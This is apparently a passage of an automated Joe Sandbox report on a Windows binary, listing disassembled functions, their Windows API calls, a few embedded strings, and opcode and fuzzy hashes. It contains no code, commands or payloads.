Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
Instruction ID: 04f23d671cafc6f2f747c74d86f0f0dfbfab4945daeb3b5b8db5be1ad71fc0d3
Opcode Fuzzy Hash: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
Instruction Fuzzy Hash: 4AE08C12A2492582FB64BB2AEC4267A9321AF89B94B885031CE0D07325CE28C4899A10

Function 00007FF716122490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF7161224A2

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction ID: fae7a202de719e4e34a4cf7ad59c6377d671c5760dfac8d631d3ae4d1311ac59
Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction Fuzzy Hash: 98D0C912D0A891C2EA50A639AC5207EA251AF92735FF44721DA3EC16E1CA1DA49AB221

Function 00007FF716127FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE ref: 00007FF716127FD2

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
Instruction ID: 37b5222e680369738d6e0e09332d8300404fcceafb65c00b98b637e29a45f4f4
Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
Instruction Fuzzy Hash: 2EC08C20F0A902C1EB086B2ADCCA02B53A5BB40B14BB14039C52CC1120CE2CC4EEA355

Non-executed Functions

Function 00007FF71611C2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF71611DE04: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF71611CF4B), ref: 00007FF71611DE27
Part of subcall function 00007FF71611DE04: GetLastError.KERNEL32 ref: 00007FF71611DE88
Part of subcall function 00007FF71611DE04: CloseHandle.KERNEL32 ref: 00007FF71611DE9B

wcscpy.LIBCMT ref: 00007FF71611CBC8
wcscpy.LIBCMT ref: 00007FF71611CBFE
CreateFileW.KERNEL32 ref: 00007FF71611CC38
DeviceIoControl.KERNEL32 ref: 00007FF71611CD01
CloseHandle.KERNEL32 ref: 00007FF71611CD12
GetLastError.KERNEL32 ref: 00007FF71611CD2E
RemoveDirectoryW.KERNEL32 ref: 00007FF71611CD7D
DeleteFileW.KERNEL32 ref: 00007FF71611CD88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611CE89
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611CE8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611CE9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611CEA1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611CEAD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611CEB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611CEB9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611CEBF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611CEC5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611CECB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611CED1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611CED7

Strings

\??\, xrefs: 00007FF71611C392, 00007FF71611C3B8
SeCreateSymbolicLinkPrivilege, xrefs: 00007FF71611C34F
SeRestorePrivilege, xrefs: 00007FF71611C343
UNC\, xrefs: 00007FF71611C53F, 00007FF71611C55D

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2659423929-3508440684
Opcode ID: 75b821c6db27436d22f5505910e7598aa5d0862ec495f4d94d2e237c059e9cbb
Instruction ID: 5237da1c9f29ee3cb31948489765e1d867c08e20472ba994067bed4064c2c1d9
Opcode Fuzzy Hash: 75b821c6db27436d22f5505910e7598aa5d0862ec495f4d94d2e237c059e9cbb
Instruction Fuzzy Hash: 0D62B3A2F18E4285FB00EB74E8452BEA361AB857B4F904231DA6D57AD9DF3CD189D310

Function 00007FF71612F180 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON

Download Yara Rule

APIs

_Init_thread_footer.LIBCMT ref: 00007FF716130528

Part of subcall function 00007FF71612AAE0: LoadStringW.USER32 ref: 00007FF71612AB67
Part of subcall function 00007FF71612AAE0: LoadStringW.USER32 ref: 00007FF71612AB80

Part of subcall function 00007FF71613B0DC: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00007FF716130429), ref: 00007FF71613B110
Part of subcall function 00007FF71613B0DC: SetLastError.KERNEL32 ref: 00007FF71613B153

Part of subcall function 00007FF71611129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF716111396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716130490
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716130496
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613049C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304A2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304A8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304C0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304C6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304CC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304D2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304DE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304E4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304EA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161304F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716130532
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716130538

Strings

%s: %s, xrefs: 00007FF71612FC11
%ls, xrefs: 00007FF71612F3AC, 00007FF71612F3FF

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
String ID: %ls$%s: %s
API String ID: 2539828978-2259941744
Opcode ID: b94a3b4d4ee99872e46ecaca9b73eb32f2d8f4e98bb6d8a8cc0fe3901ec98d03
Instruction ID: 0d6a948cb1ced2e28a659465c196abe007e90d4440cf0e810d0bd00bb974e6a5
Opcode Fuzzy Hash: b94a3b4d4ee99872e46ecaca9b73eb32f2d8f4e98bb6d8a8cc0fe3901ec98d03
Instruction Fuzzy Hash: 9DB29862A58A8281FA10BB25FC551BBE351FFD67B0F904236E69D436E6EF2CD148D310

Function 00007FF716152550 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF716152C12
memcpy_s.LIBCMT ref: 00007FF7161535BF
memcpy_s.LIBCMT ref: 00007FF716153666

Part of subcall function 00007FF7161538BC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7161538EE

memcpy_s.LIBCMT ref: 00007FF71615372F

Part of subcall function 00007FF71614D008: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71614D02D

Strings

1#SNAN, xrefs: 00007FF7161537C9
1#QNAN, xrefs: 00007FF7161537E8
1#IND, xrefs: 00007FF7161537AA
1#INF, xrefs: 00007FF716153807

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfomemcpy_s
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 1759834784-2761157908
Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
Instruction ID: 280cdb419c202fb5661ed8aa630e3aee89766abc3f674475b67dd3bb57ee09d5
Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
Instruction Fuzzy Hash: 0EB20973E089824AF725AE6DEC406FEE7B1FB45398F805135DA0957B88DF38E5089B10

Function 00007FF716121A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF716121A97
GetLongPathNameW.KERNEL32 ref: 00007FF716121AE0
GetShortPathNameW.KERNEL32 ref: 00007FF716121B21
GetShortPathNameW.KERNEL32 ref: 00007FF716121B6A

Part of subcall function 00007FF7161313C4: CompareStringW.KERNEL32 ref: 00007FF7161313E3

MoveFileW.KERNEL32 ref: 00007FF716121DFE
MoveFileW.KERNEL32 ref: 00007FF716121E65

Part of subcall function 00007FF716122134: CreateFileW.KERNEL32 ref: 00007FF71612223C

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716121FE1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716121FE7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716121FED

Strings

rtmp, xrefs: 00007FF716121CF4, 00007FF716121D03

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
String ID: rtmp
API String ID: 3587137053-870060881
Opcode ID: 9a6b4eb23280b2374bd97dfab45b851d954896022b1567a2b07181d6df3ed98a
Instruction ID: 9a45f02f2464f13098236120cd6c57206e1981f836950d5577e8cd85e75a6dfd
Opcode Fuzzy Hash: 9a6b4eb23280b2374bd97dfab45b851d954896022b1567a2b07181d6df3ed98a
Instruction Fuzzy Hash: 89F1B262A08E4281FB10EB75EC411BFA762EB857A4FA00135EB4D43AA9DF3CD58DD750

Function 00007FF716125B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 00007FF716125BC2
GetFullPathNameW.KERNEL32 ref: 00007FF716125C0E
GetFullPathNameW.KERNEL32 ref: 00007FF716125D2B
GetFullPathNameW.KERNEL32 ref: 00007FF716125D70
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716125EE0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716125EE6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716125EEC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716125EF2

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: FullNamePath_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1693479884-0
Opcode ID: f4aab3d6a38d3a7c87b22c38f8e02ebac67e4094d45f76237e24e5c31d843a01
Instruction ID: 1e45f86d84b91e7431ab0a0577532200e51b878d71027d56e1b567aae2221bca
Opcode Fuzzy Hash: f4aab3d6a38d3a7c87b22c38f8e02ebac67e4094d45f76237e24e5c31d843a01
Instruction Fuzzy Hash: 75A1B462F14E5185FE00EB79AC841BEA362AF45BB4BA44235DE2E17BC9DF3CD0859210

Function 00007FF716143170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF71614318C
RtlCaptureContext.KERNEL32 ref: 00007FF7161431B9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7161431D3
RtlVirtualUnwind.KERNEL32 ref: 00007FF716143214
IsDebuggerPresent.KERNEL32 ref: 00007FF716143268
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF716143289
UnhandledExceptionFilter.KERNEL32 ref: 00007FF716143294

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
Instruction ID: 460d73abdfb3c69aa018142757f685cd57cc51332460b997286d6806efca6dfd
Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
Instruction Fuzzy Hash: B8314F72608F818AFBA0AF65EC503EAB370FB44754F84403ADA4D47A88EF38D548D710

Function 00007FF7161476D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF716147751
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF716147769
RtlVirtualUnwind.KERNEL32 ref: 00007FF7161477A4
IsDebuggerPresent.KERNEL32 ref: 00007FF7161477DD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7161477E7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7161477F2

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
Instruction ID: 56890a3472740dcfd94012637e7913c2d9f5b5c8104119af5ea2178914085777
Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
Instruction Fuzzy Hash: F6315032608F8186E760DF25FC402AEB3A4FB85764F940135EA8D43B99EF38D559D710

Function 00007FF716111AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716111EA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716111EAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716111EB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716111EBB

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: de64f728d12beaa22573aa5c8c3373be7786903fe8bc75938e9b5cbc412359fd
Instruction ID: 4208e671b6c7645fb4088235fd14a81fa6f0c6d85268dc42436d3565586b6c34
Opcode Fuzzy Hash: de64f728d12beaa22573aa5c8c3373be7786903fe8bc75938e9b5cbc412359fd
Instruction Fuzzy Hash: D0B1CDA2B14E8685FA10AB75EC452EEE361FB857A4F804231EA4C03B99EF3CD548D310

Function 00007FF71614FA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF71614FAC4

Part of subcall function 00007FF716147934: GetCurrentProcess.KERNEL32(00007FF716150CCD), ref: 00007FF716147961

Strings

*?, xrefs: 00007FF71614FAEB
., xrefs: 00007FF71614FEE4

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
